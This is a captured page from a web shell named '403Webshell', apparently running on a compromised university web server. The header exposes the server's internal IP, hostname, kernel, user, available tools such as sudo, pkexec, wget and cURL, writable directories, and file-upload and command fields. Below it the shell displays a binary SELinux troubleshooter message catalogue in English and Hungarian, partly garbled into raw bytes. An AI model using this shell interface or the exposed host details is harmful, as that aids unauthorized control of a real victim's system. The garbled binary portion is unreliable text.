403Webshell
Server IP : 172.24.0.40  /  Your IP : 216.73.216.10
Web Server : Apache
System : Linux dbweb26.ust.edu.ph 4.18.0-513.5.1.el8_9.x86_64 #1 SMP Fri Sep 29 05:21:10 EDT 2023 x86_64
User : apache ( 48)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/locale/hu/LC_MESSAGES/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/locale/hu/LC_MESSAGES/setroubleshoot-plugins.mo
��}���
��
1vV�g�hg
|�
(M
vR���tqI�~0��,m/�.�b�\�t� ��!S�#P�#N*$Ny$G�$]%On%k�%R*&q}&f�&VV'V�'S(jX(B�(T)^[)��)t|*?�*Z1+��+Y?.U�.6�0�&2#�4X�728C9V:	l;
v<�=z�>�?��?�`@��@3�AeB_iBe�Bf/C�C��C�tD�-E��E\uGb�G\5H+�Hc�H7"I<ZI:�I�I�I4�I'J,BJoJ?�J0�J1�J].K2�KK�K2L]>Lc�LM,M=MdPMN�MN_N]|NE�N- ONO4gO!�O'�O$�O P_,PR�PO�P9/Q:iQ�Q��QNRBiRA�R^�RsMS��S�XT$V[;Wq�X|	Y��Y�Zl�Z�\��^�Z`�ap�a�c��c��d[=f��g�j�k�lC�o�r^�s[Mtb�tbudou_�uT4vs�vX�v�Vw��wmgxf�xg<y~�yQ#zduzl�z�G{�0|Q�|w-}8�}|ހy[�SՄ�)��Ĉ�`�9�;�K[�2��6ڑ4��F�����ʕ�t��&�.���,�d��u�r��-��2����˛���\��b�\F�+��hϟ<8�Hu�J��	�$�BC�!��7��%�P�:W�8��sˢ8?�Px�8ɣr�lu��0�#��6�uĥ#:�}^��ܦJb�7���2�/8�,h�7�� ͨs�ib�b̩A/�Aq����Ϊz�X��O�jB�{���)�emr'wc}0@F&AL)yl?agq\PxC`jQt
dU*H6s"3E!{|
S4hIBf-v$1_i	[u^nG zkJp%>]/#7R;,89Z.=NVKW:b<T25O(oYDXM+
	dac_override and dac_read_search capabilities usually indicates that the root process does not have access to a file based on the permission flags.  This usually mean you have some file with the wrong ownership/permissions on it.
    

    SELinux denied access requested by $SOURCE. It is not
    expected that this access is required by $SOURCE and this access
    may signal an intrusion attempt. It is also possible that the specific
    version or configuration of the application is causing it to require
    additional access.

    
    Attempt restorecon -v '$TARGET_PATH' or chcon -t SIMILAR_TYPE '$TARGET_PATH'
    
    Changing the "$BOOLEAN" boolean to true will allow this access:
    "setsebool -P $BOOLEAN=1"
    
    Changing the "$BOOLEAN" boolean to true will allow this access:
    "setsebool -P $BOOLEAN=1."
    
    Changing the "allow_ftpd_use_nfs" boolean to true will allow this access:
    "setsebool -P allow_ftpd_use_nfs=1."
    
    Changing the file_context to mnt_t will allow mount to mount the file system:
    "chcon -t mnt_t '$TARGET_PATH'."
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t mnt_t '$FIX_TARGET_PATH'"
    
    If httpd scripts should be allowed to write to public directories you need to turn on the $BOOLEAN boolean and change the file context of the public directory to public_content_rw_t.  Read the httpd_selinux
    man page for further information:
    "setsebool -P $BOOLEAN=1; chcon -t public_content_rw_t <path>"
    You must also change the default file context labeling files on the system in order to preserve public directory labeling even on a full relabel.  "semanage fcontext -a -t public_content_rw_t <path>"
    
    If you trust $TARGET_PATH to run correctly, you can change the
    file context to textrel_shlib_t. "chcon -t textrel_shlib_t
    '$TARGET_PATH'"
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t textrel_shlib_t '$FIX_TARGET_PATH'"

    
    If you want $SOURCE to continue, you must turn on the
    $BOOLEAN boolean.  Note: This boolean will affect all applications
    on the system.
    
    If you want httpd to send mail you need to turn on the
    $BOOLEAN boolean: "setsebool -P
    $BOOLEAN=1"
    
    If you want to allow $SOURCE to bind to port $PORT_NUMBER, you can execute 

    # semanage port -a -t PORT_TYPE -p %s $PORT_NUMBER
    
where PORT_TYPE is one of the following: %s.

    

If this system is running as an NIS Client, turning on the allow_ypbind boolean may fix the problem.  setsebool -P allow_ypbind=1.
    
    If you want to allow $SOURCE to connect to $PORT_NUMBER, you can execute 

    # sandbox -X -t sandbox_net_t $SOURCE
    
    If you want to allow $SOURCE to connect to $PORT_NUMBER, you can execute 

    # semanage port -a -t PORT_TYPE -p %s $PORT_NUMBER

    where PORT_TYPE is one of the following: %s.
    
    If you want to change the file context of $TARGET_PATH so that the automounter can execute it you can execute "chcon -t bin_t $TARGET_PATH".  If you want this to survive a relabel, you need to permanently change the file context: execute  "semanage fcontext -a -t bin_t '$FIX_TARGET_PATH'".
    
    SELinux denied access requested by $SOURCE. It is not
    expected that this access is required by $SOURCE and this access
    may signal an intrusion attempt. It is also possible that the specific
    version or configuration of the application is causing it to require
    additional access.
    
    SELinux denied access requested by the $SOURCE command. It looks like this is either a leaked descriptor or $SOURCE output was redirected to a file it is not allowed to access.  Leaks usually can be ignored since SELinux is just closing the leak and reporting the error.  The application does not use the descriptor, so it will run properly.  If this is a redirection, you will not get output in the $TARGET_PATH.  You should generate a bugzilla on selinux-policy, and it will get routed to the appropriate package.  You can safely ignore this avc.
    
    SELinux denied access to $TARGET_PATH requested by $SOURCE.
    $TARGET_PATH has a context used for sharing by a different program. If you
    would like to share $TARGET_PATH from $SOURCE also, you need to
    change its file context to public_content_t.  If you did not intend to
    allow this access, this could signal an intrusion attempt.
    
    SELinux denied cvs access to $TARGET_PATH.
    If this is a CVS repository it needs to have a file context label of
    cvs_data_t. If you did not intend to use $TARGET_PATH as a CVS repository
    it could indicate either a bug or it could signal an intrusion attempt.
    
    SELinux denied xen access to $TARGET_PATH.
    If this is a XEN image, it has to have a file context label of
    xen_image_t. The system is setup to label image files in directory /var/lib/xen/images
    correctly.  We recommend that you copy your image file to /var/lib/xen/images.
    If you really want to have your xen image files in the current directory, you can relabel $TARGET_PATH to be xen_image_t using chcon.  You also need to execute semanage fcontext -a -t xen_image_t '$FIX_TARGET_PATH' to add this
    new path to the system defaults. If you did not intend to use $TARGET_PATH as a xen
    image it could indicate either a bug or an intrusion attempt.
    
    SELinux has denied the $SOURCE access to potentially
    mislabeled files $TARGET_PATH.  This means that SELinux will not
    allow httpd to use these files. If httpd should be allowed this access to these files you should change the file context to one of the following types, %s.
    Many third party apps install html files
    in directories that SELinux policy cannot predict.  These directories
    have to be labeled with a file context which httpd can access.
    
    SELinux has denied the $SOURCE_PATH from executing potentially
    mislabeled files $TARGET_PATH.  Automounter can be setup to execute
    configuration files. If $TARGET_PATH is an automount executable
    configuration file it needs to have a file label of bin_t.
    If automounter is trying to execute something that it is not supposed to, this could indicate an intrusion attempt.
    
    SELinux has prevented vbetool from performing an unsafe memory operation.
    
    SELinux has prevented wine from performing an unsafe memory operation.
    
    SELinux is preventing $SOURCE_PATH "$ACCESS" access on $TARGET_PATH.
    
    SELinux is preventing $SOURCE_PATH "$ACCESS" access to $TARGET_PATH.
    
    SELinux is preventing $SOURCE_PATH "$ACCESS" to $TARGET_PATH.
    
    SELinux is preventing $SOURCE_PATH access to a leaked $TARGET_PATH file descriptor.
    
    SELinux is preventing $SOURCE_PATH from binding to port $PORT_NUMBER.
    
    SELinux is preventing $SOURCE_PATH from changing the access
    protection of memory on the heap.
    
    SELinux is preventing $SOURCE_PATH from connecting to port $PORT_NUMBER.
    
    SELinux is preventing $SOURCE_PATH from creating a file with a context of $SOURCE_TYPE on a filesystem.
    
    SELinux is preventing $SOURCE_PATH from loading $TARGET_PATH which requires text relocation.
    
    SELinux is preventing $SOURCE_PATH from making the program stack executable.
    
    SELinux is preventing Samba ($SOURCE_PATH) "$ACCESS" access to $TARGET_PATH.
    
    SELinux is preventing cvs ($SOURCE_PATH) "$ACCESS" access to $TARGET_PATH
    
    SELinux is preventing the $SOURCE_PATH from executing potentially mislabeled files $TARGET_PATH.
    
    SELinux is preventing the http daemon from sending mail.
    
    SELinux is preventing xen ($SOURCE_PATH) "$ACCESS" access to $TARGET_PATH.
    
    SELinux policy is preventing an httpd script from writing to a public
    directory.
    
    SELinux policy is preventing an httpd script from writing to a public
    directory.  If httpd is not setup to write to public directories, this
    could signal an intrusion attempt.
    
    SELinux prevented $SOURCE from mounting on the file or directory
    "$TARGET_PATH" (type "$TARGET_TYPE").
    
    SELinux prevented httpd $ACCESS access to http files.
    
    SELinux prevented the ftp daemon from $ACCESS files stored on a CIFS filesystem.
    
    SELinux prevented the ftp daemon from $ACCESS files stored on a CIFS filesystem.
    CIFS (Comment Internet File System) is a network filesystem similar to
    SMB (<a href="http://www.microsoft.com/mind/1196/cifs.asp">http://www.microsoft.com/mind/1196/cifs.asp</a>)
    The ftp daemon attempted to read one or more files or directories from
    a mounted filesystem of this type.  As CIFS filesystems do not support
    fine-grained SELinux labeling, all files and directories in the
    filesystem will have the same security context.

    If you have not configured the ftp daemon to read files from a CIFS filesystem
    this access attempt could signal an intrusion attempt.
    
    SELinux prevented the ftp daemon from $ACCESS files stored on a NFS filesystem.
    
    SELinux prevented the ftp daemon from $ACCESS files stored on a NFS filesystem.
    NFS (Network Filesystem) is a network filesystem commonly used on Unix / Linux
    systems.

    The ftp daemon attempted to read one or more files or directories from
    a mounted filesystem of this type.  As NFS filesystems do not support
    fine-grained SELinux labeling, all files and directories in the
    filesystem will have the same security context.

    If you have not configured the ftp daemon to read files from a NFS filesystem
    this access attempt could signal an intrusion attempt.
    
    Sometimes a library is accidentally marked with the execstack flag,
    if you find a library with this flag you can clear it with the
    execstack -c LIBRARY_PATH.  Then retry your application.  If the
    app continues to not work, you can turn the flag back on with
    execstack -s LIBRARY_PATH.
    
    The $SOURCE application attempted to change the access protection of memory on
    the heap (e.g., allocated using malloc).  This is a potential security
    problem.  Applications should not be doing this. Applications are
    sometimes coded incorrectly and request this permission.  The
    <a href="http://people.redhat.com/drepper/selinux-mem.html">SELinux Memory Protection Tests</a>
    web page explains how to remove this requirement.  If $SOURCE does not work and
    you need it to work, you can configure SELinux temporarily to allow
    this access until the application is fixed. Please file a bug
    report against this package.
    
    The $SOURCE application attempted to make its stack
    executable.  This is a potential security problem.  This should
    never ever be necessary. Stack memory is not executable on most
    OSes these days and this will not change. Executable stack memory
    is one of the biggest security problems. An execstack error might
    in fact be most likely raised by malicious code. Applications are
    sometimes coded incorrectly and request this permission.  The
    <a href="http://people.redhat.com/drepper/selinux-mem.html">SELinux Memory Protection Tests</a>
    web page explains how to remove this requirement.  If $SOURCE does not
    work and you need it to work, you can configure SELinux
    temporarily to allow this access until the application is fixed. Please
file a bug report.
    
    Use a command like "cp -p" to preserve all permissions except SELinux context.
    
    You can alter the file context by executing chcon -R -t rsync_data_t '$TARGET_PATH'
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t rsync_data_t '$FIX_TARGET_PATH'"
    
    You can alter the file context by executing chcon -R -t samba_share_t '$TARGET_PATH'
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t samba_share_t '$FIX_TARGET_PATH'"
    
    You can alter the file context by executing chcon -t public_content_t '$TARGET_PATH'
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t public_content_t '$FIX_TARGET_PATH'"
    
    You can alter the file context by executing chcon -t swapfile_t '$TARGET_PATH'
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t swapfile_t '$FIX_TARGET_PATH'"
    
    You can alter the file context by executing chcon -t virt_image_t '$TARGET_PATH'
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t virt_image_t '$FIX_TARGET_PATH'"
    
    You can alter the file context by executing chcon -t xen_image_t '$TARGET_PATH'
    You must also change the default file context files on the system in order to preserve them even on a full relabel.  "semanage fcontext -a -t xen_image_t '$FIX_TARGET_PATH'"
    
    You can execute the following command as root to relabel your
    computer system: "touch /.autorelabel; reboot"
    
    You can generate a local policy module to allow this
    access - see <a href="http://docs.fedoraproject.org/selinux-faq-fc5/#id2961385">FAQ</a>

    Please file a bug report.
    
    You can generate a local policy module to allow this
    access - see <a href="http://docs.fedoraproject.org/selinux-faq-fc5/#id2961385">FAQ</a>
    
    You can restore the default system context to this file by executing the
    restorecon command.  restorecon '$SOURCE_PATH'.
    
    You can restore the default system context to this file by executing the
    restorecon command.  restorecon '$TARGET_PATH', if this file is a directory,
    you can recursively restore using restorecon -R '$TARGET_PATH'.
    
    Your system may be seriously compromised!
    
    Your system may be seriously compromised! $SOURCE_PATH attempted to mmap low kernel memory.
    
    Your system may be seriously compromised! $SOURCE_PATH tried to load a kernel module.
    
    Your system may be seriously compromised! $SOURCE_PATH tried to modify SELinux enforcement.
    
    Your system may be seriously compromised! $SOURCE_PATH tried to modify kernel configuration.
    
Disable IPV6 properly.
    
Either remove the mozplluger package by executing 'yum remove mozplugger'
Or turn off enforcement of SELinux over the Firefox plugins.
setsebool -P unconfined_mozilla_plugin_transition 0
    
If you decide to continue to run the program in question you will need
to allow this operation.  This can be done on the command line by
executing:

# setsebool -P mmap_low_allowed 1

You tried to place a type on a %s that is not a file type.  This is not allowed, you must assigne a file type.  You can list all file types using the seinfo command.

seinfo -afile_type -x

     Changing the "$BOOLEAN" and
    "$WRITE_BOOLEAN" booleans to true will allow this access:
    "setsebool -P $BOOLEAN=1 $WRITE_BOOLEAN=1".
    warning: setting the "$WRITE_BOOLEAN" boolean to true will
    allow the ftp daemon to write to all public content (files and
    directories with type public_content_t) in addition to writing to
    files and directories on CIFS filesystems.  # semanage fcontext -a -t SIMILAR_TYPE '$FIX_TARGET_PATH'
# restorecon -v '$FIX_TARGET_PATH'# semanage fcontext -a -t samba_share_t '$FIX_TARGET_PATH%s'
# restorecon %s -v '$FIX_TARGET_PATH'# semanage fcontext -a -t virt_image_t '$FIX_TARGET_PATH'
# restorecon -v '$FIX_TARGET_PATH'# semanage port -a -t %s -p %s $PORT_NUMBER# semanage port -a -t PORT_TYPE -p %s $PORT_NUMBER
    where PORT_TYPE is one of the following: %s.A process might be attempting to hack into your system.Add 
net.ipv6.conf.all.disable_ipv6 = 1
to /etc/sysctl.conf
Contact your security administrator and report this issue.Restore
ContextRestore ContextSELinux is preventing $SOURCE_PATH "$ACCESS" access.Turn off memory protectionYou can read '%s' man page for more details.You might have been hacked.You must tell SELinux about this by enabling the '%s' boolean.
You need to change the label on $FIX_TARGET_PATHYou need to change the label on $TARGET_BASE_PATHYou need to change the label on $TARGET_BASE_PATH to public_content_t or public_content_rw_t.You need to change the label on $TARGET_BASE_PATH'You need to change the label on $TARGET_PATH to a type of a similar device.You need to change the label on '$FIX_TARGET_PATH'You should report this as a bug.
You can generate a local policy module to allow this access.You should report this as a bug.  
You can generate a local policy module to dontaudit this access.execstack -c %sif you think that you might have been hackedsetsebool -P %s %sturn on full auditing to get path information about the offending file and generate the error again.use a command like "cp -p" to preserve all permissions except SELinux context.you can run restorecon.you may be under attack by a hacker, since confined applications should never need this access.you may be under attack by a hacker, since confined applications should not need this access.you may be under attack by a hacker, this is a very dangerous access.you must change the labeling on $TARGET_PATH.you must fix the labels.you must move the cert file to the ~/.cert directoryyou must pick a valid file label.you must remove the mozplugger package.you must setup SELinux to allow thisyou must tell SELinux about thisyou must tell SELinux about this by enabling the 'httpd_unified' and 'http_enable_cgi' booleansyou must tell SELinux about this by enabling the vbetool_mmap_zero_ignore boolean.you must tell SELinux about this by enabling the wine_mmap_zero_ignore boolean.you must turn off SELinux controls on the Chrome plugins.you must turn off SELinux controls on the Firefox plugins.you need to add labels to it.you need to change the label on $TARGET_PATH to public_content_rw_t, and potentially turn on the allow_httpd_sys_script_anon_write boolean.you need to fully relabel.you need to report a bug. 
This is a potentially dangerous access.you need to report a bug. This is a potentially dangerous access.you need to set /proc/sys/net/ipv6/conf/all/disable_ipv6 to 1 and do not blacklist the module'you need to use a different command. You are not allowed to preserve the SELinux context on the target file system.you should clear the execstack flag and see if $SOURCE_PATH works correctly.
Report this as a bug on %s.
You can clear the exestack flag by executing:Project-Id-Version: PACKAGE VERSION
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2021-09-07 17:26+0200
PO-Revision-Date: 2017-08-31 08:32-0400
Last-Translator: Copied by Zanata <copied-by-zanata@zanata.org>
Language-Team: Hungarian (http://www.transifex.com/projects/p/fedora/language/hu/)
Language: hu
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Plural-Forms: nplurals=2; plural=(n != 1);
X-Generator: Zanata 4.6.2

	dac_override és dac_read_search képességek általában azt jelzik, hogy a root folyamatnak nincs hozzáférése ahhoz a más engedélyekkel rendelkező fájlhoz. Ez azt jelenti, hogy valami probléma van annak a fájlnak a rosszul beállított tulajdonosi/engedélyeivel.  

    SELinux elutasította a(z) $SOURCE által igényelt
    hozzáférést. Normál esetben a(z) $SOURCE nem igényli
    ezt a hozzáférést, ezért ez a hozzáférés egy behatolási próbálkozást
    is jelezhet. Az is elképzelhető, hogy az alkalmazás verziója vagy
    beállítása miatt van szükség további hozzáférésre.

    
    Próbálja meg a restorecon -v '$TARGET_PATH' vagy a chcon -t HASONLÓ_TÍPUS '$TARGET_PATH' parancsot.
    
    „$BOOLEAN” logikai érték igazra állítása engedélyezi e hozzáférést:
    „setsebool -P $BOOLEAN=1”
    
    „$BOOLEAN” logikai érték igazra állításával megengedheti e hozzáférést:
    „setsebool -P $BOOLEAN=1”.
    
    Az "allow_ftpd_use_nfs" logikai érték igazra való módosítása
    engedélyezi ezt a hozzáférést: "setsebool -P allow_ftpd_use_nfs=1".
    
    A fájl beállítás megváltozatatása mnt_t típusúra megengedi mountnak, hogy
    becsatoljon egy fájlrendszert: „chcon -t mnt_t '$TARGET_PATH'”.
    Az alapértelmezett fájl beállítást is meg kell változtatni a rendszerben, hogy a teljes újracímkézés se rontsa el a beállítást: „semanage fcontext -a -t mnt_t '$FIX_TARGET_PATH'”
    
Ha szükséges engedélyezni, hogy a "httpd"-szkriptek írhassanak a
    nyilvános könyvtárakba, akkor be kell kapcsolnia a(z) $BOOLEAN
    logikai értéket, valamint módosítania kell a nyilvános könyvtár
    fájl beállítását erre: public_content_rw_t. 
További információk  találhatók a "httpd_selinux" kézikönyvlapon (man). 
A fenti tevékenységeket elvégző parancs: "setsebool -P $BOOLEAN=1;
    chcon -t public_content_rw_t < elérési útvonal>".

    Az alap beállítás fájlokat is meg kell változtatnia, hogy az előbbi 
    maradandó legyen teljes újracímkézés esetén is. 
    „semanage fcontext -a -t public_content_rw_t <elérési útvonal>”
    Ha bíznak abban, hogy $TARGET_PATH helyesen működik, akkor
    módosíthatják a fájl beállítást textrel_shlib_t típusra:
    „chcon -t textrel_shlib_t '$TARGET_PATH'”
    Az alap fájl beállítás fájlokat szintén meg kell változtatni, hogy a változások megmaradjanak még teljes újracímkézés esetén is:
    „semanage fcontext -a -t textrel_shlib_t '$FIX_TARGET_PATH'”

    
    Ha szeretné, hogy $SOURCE folytatódjon, akkor be kell
    kapcsolni $BOOLEAN logikai értéket.  Megjegyzés: ez a
    logikai érték a rendszer minden alkalmazására kihat.
    
    Ha azt szeretné, hogy a httpd levelet küldjön, akkor be kell
    kapcsolnia $BOOLEAN logikai értéket:
    „setsebool -P $BOOLEAN=1”.
    
    Ha meg akarja engedni, hogy $SOURCE a $PORT_NUMBER. portot elfoglalja, adja ki a <br>
    <b># semanage port -a -t PORT_TYPE -p %s $PORT_NUMBER</b>
    <br>parancsot, ahol a PORT_TYPE egyike a következőknek: %s.

    <br><br>Ha pedig ez a rendszer NIS ügyfél, az allow_ypbind igazra állítása megjavíthatja a problémát:  setsebool -P allow_ypbind=1.
    
Ha engedélyezni szeretné $SOURCE számára, hogy csatlakozhasson a $PORT_NUMBER számú porthoz, hajtsa végre a következőt:

# sandbox -X -t sandbox_net_t $SOURCE
   Ha engedélyezni szeretné $SOURCE hogy kapcsolódhasson $PORT_NUMBER, hajtsa végre a következőt: 

    # semanage port -a -t PORT_TYPE -p %s $PORT_NUMBER

    ahol PORT_TYPE az egyik a felsoroltak közül: %s.
    
    Ha szeretné úgy módosítani $TARGET_PATH fájl beállítását, hogy az önműködő csatoló végrehajthassa azt, akkor használhatja a következő parancsot: „chcon -t bin_t.$TARGET_PATH„”. Ha szeretné, hogy ez túléljen egy újracímkézést, akkor maradandóan kell módosítania a fájl beállítását: hajtsa végre a „semanage fcontext -a -t bin_t $TARGET_PATH” parancsot.
    
SELinux megtagadta a hozzáférést $SOURCE forrás alapján. Ha ez nem volt várható
hogy a hozzáférésre lesz szüksége a $SOURCE számára,
előfordulhat hogy ez egy jel a betörési kísérletre. Az is előfordulhat, hogy
egy specifikus verzió vagy összeállítása az alkalmazásnak okozza ezt, és további 
jogosultságokat igényel.
    SELinux megtagadta a hozzáférést, amit $SOURCE parancs kért. Úgy tűnik ez vagy egy szivárgó leíró vagy $SOURCE kimenetét olyan fájlba irányították, amire nem terjed ki a jogköre.  Szivárgásokat szokás szerint figyelmen kívül hagyhatják, mivel SELinux lezárja azt, és jelenti a hibát.  Az alkalmazás nem használja a leírót, így az jól fog futni.  Ha ez egy átirányítás, akkor nem fog megjelenni $TARGET_PATH kimenete.  Készítsen egy bugzilla jelentést az selinux-policy alkalmazásra, és azt a megfelelő csomaghoz továbbítják majd.  Nyugodtan figyelmen kívül hagyhatja ezt az üzenetet.
    
    SELinux elutasította $SOURCE által igényelt hozzáférést $TARGET_PATH
    helyre. $TARGET_PATH beállítását más program megosztásra használja.
    Ha szeretné megosztani $TARGET_PATH fájlt $SOURCE programból is,
    akkor változtassa a fájl beállítását public_content_t típusúra.
    Ha nem akart ilyen hozzáférést megengedni, akkor
    ez behatolási próbálkozást is jelezhet.
    
    SELinux megtagadta cvs hozzáférését ehhez: $TARGET_PATH.
    Ha ez CVS tároló, akkor cvs_data_t beállítású címkét igényel.
    Ha nincs szándékában $TARGET_PATH helyet CVS tárolónak használni,
    akkor ez hibát vagy behatolási kísérletet jelezhet.
    
    SELinux elutasította, hogy xen hozzáférjen $TARGET_PATH
    fájlhoz. Ha ez XEN kép, akkor xen_image_t fájl beállítás
    címke kell neki. A rendszert úgy állították be, hogy a /var/lib/xen/
    helyen levő kép fájlokat jól címkézze. Javasolt e könyvtárba másolni
    a kép fájlt. Ha valóban az aktuális mappába akarja tenni a xem kép fájlokat, akkor $TARGET_PATH fájlt átcímkézheti xen_image_t típusra a chcon paranccsal. A semanage fcontext -a -t xen_image_t '$FIX_TARGET_PATH' végrehajtására szintén szükség lehet, hogy ezt az új ösvényt hozzáadja a rendszer alapértelmezésihez.
    Ha nem akarta $TARGET_PATH fájlt Xen képként használni,
    akkor ez egy hibát vagy egy behatolás próbálkozást jelezhet.
    
    SELinux elutasította, hogy $SOURCE hozzáférjen $TARGET_PATH úton lévő elcímkézett fájlokhoz. Ez azt jelenti, hogy SELinux nem fogja
    megengedni httpd-nek ezeknek a fájloknak a használatát. Ha httpd-nek el kell
    érnie ezeket a fájlokat, akkor változatassa meg a fájlok beállítását a 
    következő típusok egyikére: %s.
    Sok idegen alkalmazás telepít html fájlokat olyan mappákba,
    amiket az SELinux szabályzat nem tud előre jelezni. Ezeket a mappákat
    olyan beállítással kell felcímkézni, amihez a httpd hozzáférhet.
    
    SELinux megakadályozta, hogy $SOURCE_PATH elérési útról végrehajtsa
    $TARGET_PATH útban lévő elcímkézett fájlokat.  Az automounter
    beállítható úgy, hogy végrehajtson beállítási fájlokat.
    Ha $TARGET_PATH célon lévő alkalmazás egy automount program, akkor
    azt bin_t típusúnak kell címkézni. Ha az automounter megpróbál végrehajtani valamit, amit nem
    volna szabad, akkor ez behatolás kísérletet jelezhet.
    
    SELinux megakadályozta, hogy vbetool nem biztonságos memóriaműveletet végezzen.
    
    SELinux megakadályozta, hogy wine nem biztonságos memóriaműveletet végezzen.
    
    SELinux megakadályozza $SOURCE_PATH „$ACCESS” hozzáférését $TARGET_PATH helyre.
    
    SELinux megakadályozza $SOURCE_PATH „$ACCESS” hozzáférését ehhez: $TARGET_PATH.
    
    SELinux megakadályozza $SOURCE_PATH „$ACCESS” hozzáférését $TARGET_PATH fájlhoz.
    
    SELinux megakadályozza, hogy $SOURCE_PATH hozzáférjen $TARGET_PATH fájleíróhoz.
    
    SELinux megakadályozta, hogy $SOURCE_PATH elfoglalja $PORT_NUMBER portot.
    
    SELinux megakadályozza, hogy $SOURCE_PATH megváltoztassa a heap 
    memória hozzáférés védelmét.
    
    SELinux megakadályozza, hogy $SOURCE_PATH kapcsolódjon $PORT_NUMBER. kapura.
    
    SELinux megakadályozza, hogy $SOURCE_PATH egy $SOURCE_TYPE
    beállítással fájlt készítsen egy fájlrendszerben.
    
    SELinux megakadályozza, hogy $SOURCE_PATH betöltsön $TARGET_PATH elérési útról,
    amihez szöveg áthelyezés szükséges.
    
    SELinux megakadályozza, hogy $SOURCE_PATH végrehajthatóvá tegye
    a verem memóriát (stack).
    
    SELinux megakadályozza Samba ($SOURCE_PATH) $ACCESS hozzáférését $TARGET_PATH fájlhoz.
    
    SELinux megakadályozza cvs ($SOURCE_PATH) „$ACCESS” hozzáférését $TARGET_PATH helyre
    
    SELinux megakadályozta, hogy $SOURCE_PATH végrehajtsa $TARGET_PATH elérési úzon lévő elcímkézett fájlokat.
    
    SELinux megakadályozza, hogy a httpd szolgáltatás levelet küldjön.
    
    SELinux megakadályozza xen ($SOURCE_PATH) $ACCESS hozzáférését $TARGET_PATH fájlhoz.
    
    SELinux-szabályzat megakadályozta, hogy egy HTTP-szkript egy
    nyilvános könyvtárba írjon.
    
    A SELinux szabályzat megakadályozta, hogy egy httpd alkalmazás írjon
    egy nyilvános mappába. Ha a httpd beállítása nem engedi meg az
    írást nyilvános mappákba, akkor ez behatolási kísérletet jelezhet.
    
    SELinux megakadályozta, hogy a(z) $SOURCE fájlrendszer-csatolást
    végezzen ezen a fájlon vagy könyvtáron: "$TARGET_PATH" (típus:
    "$TARGET_TYPE").
    
    SELinux megakadályozta httpd $ACCESS hozzáférését http fájlokhoz.
    
    SELinux megakadályozta ftpd szolgáltatás $ACCESS hozzáférését CIFS-fájlrendszeren tárolt fájlokhoz.
    
    SELinux megakadályozta ftpd szolgáltatás $ACCESS hozzáférését
    CIFS fájlrendszerben tárolt fájlokhoz.
    A CIFS (Common Internet File System) az SMB-hez
    hasonló hálózati fájlrendszer
    (<a href="http://www.microsoft.com/mind/1196/cifs.asp">http://www.microsoft.com/mind/1196/cifs.asp</a>).
    Az ftpd szolgáltatás megkísérelt olvasni egy vagy több olyan
    fájlt illetve mappát, amely ilyen típusú csatolt fájlrendszeren
    van. A CIFS fájlrendszerek nem támogatják a kifinomult
    SELinux címkézést, ezért a fájlrendszerben levő összes fájl és
    mappa ugyanazon biztonsági beállítással rendelkezik.

    Ha nem állították be ftpd szolgáltatást 
    fájlok olvasására valamely CIFS fájlrendszerből, akkor ez
    behatolás próbálkozást jelezhet.
    
    SELinux megakadályozta az ftp daemon számára, hogy hozzáféren az NFS fájlrendszerben  az $ACCESS fájlokhoz.
    
    SELinux megakadályozta, hogy az "ftp" szolgáltatás a következő
    módon hozzáférjen egy NFS-fájlrendszeren tárolt fájlokhoz:
    "$ACCESS". Az NFS (Network Filesystem, azaz hálózati fájlrendszer)
    egy olyan hálózati fájlrendszer, amely Unix- illetve
    Linux-rendszereken gyakran használatos.

    Az "ftp" szolgáltatás megkísérelt olvasni egy vagy több olyan
    fájlt illetve mappát, amely ilyen típusú csatolt fájlrendszeren
    van. Az NFS-fájlrendszerek nem támogatják a nagy részletességű
    SELinux-címkézést, ezért a fájlrendszerben levő összes fájl és
    könyvtár ugyanazon biztonsági beállítás rendelkezik.

    Ha Ön nem állította be az "ftp" szolgáltatást arra, hogy az
    fájlokat olvasson valamely NFS-fájlrendszerről, akkor ez a
    hozzáférési kísérlet behatolási próbálkozást is jelezhet.
    
Néha a kódkönyvtár véletlen folytán megjelölődhet execstack flag-el, 
ha talál ilyen kódkönyvtárat ezzel a flag-el, törölheti a
 execstack -c LIBRARY_PATH utasítással. Utána megpróbálhatja újra az alkalmazást. Ha a program
 továbbra sem működik a flag-et visszakapcsolhatja
execstack -s LIBRARY_PATH utasítással.
    $SOURCE alkalmazás megkísérelt változtatni a heap (pl. a malloc 
    függvénnyel lefoglalt) memória hozzáférés védelmén.
    Ez lehet biztonsági probléma. Alkalmazásoknak ezt tenniük.
    Néha hibás alkalmazások kérnek ilyen engedélyt.  A
    <a href="http://people.redhat.com/drepper/selinux-mem.html">SELinux Memory Protection Tests</a>
    weblap elmagyarázza, hogyan kell megszüntetni ezt az igényt.  Ha 
    $SOURCE nem működik, de szükség van rá, akkor ideiglenesen
    beállíthatja, hogy SELinux megengedje ezt a
    hozzáférést, amíg az alkalmazást ki nem javítják. Tegyen hibabejelentést
    erre a csomagra.
    
    $SOURCE alkalmazás megkísérelte végrehajthatóvá tenni a
    vermét (stack). Ez biztonsági problémát jelenthet.  Ez sohasem
    szükséges. A verem memória a legtöbb operációs
    rendszerben nem végrehajtható – ez a jövőben sem fog változni. A
    végrehajtható verem memória az egyik legnagyobb biztonsági probléma.
    A végrehajtható veremmel kapcsolatos hiba gyakran rosszindulatú
    programra utal. Bizonyos alkalmazások viszont hibásra sikerültek,
    és igénylik ezt az engedélyt. Az
    <a href="http://people.redhat.com/drepper/selinux-mem.html">SELinux Memory Protection Tests</a>
    weblap elmagyarázza, hogyan kell megszüntetni ezt az igényt. Ha $SOURCE 
    nem működik, de szükség van rá, akkor ideiglenesen beállíthatja,
    hogy SELinux engedélyezze ezt a hozzáférést, amíg az alkalmazást
    ki nem javítják. Kérem tegyen hibabejelentést.
    
